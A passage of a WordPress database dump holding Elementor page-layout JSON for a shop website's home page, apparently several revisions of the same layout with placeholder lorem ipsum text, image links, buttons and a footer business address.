\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8298,1460,'_elementor_page_assets','a:0:{}'),(8301,1461,'_elementor_edit_mode','builder'),(8302,1461,'_elementor_template_type','wp-page'),(8303,1461,'_elementor_version','3.7.7'),(8304,1461,'_wp_page_template','elementor_canvas'),(8305,1461,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8306,1461,'_elementor_page_assets','a:0:{}'),(8308,1462,'_elementor_edit_mode','builder'),(8309,1462,'_elementor_template_type','wp-page'),(8310,1462,'_elementor_version','3.7.7'),(8311,1462,'_wp_page_template','elementor_canvas'),(8312,1462,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\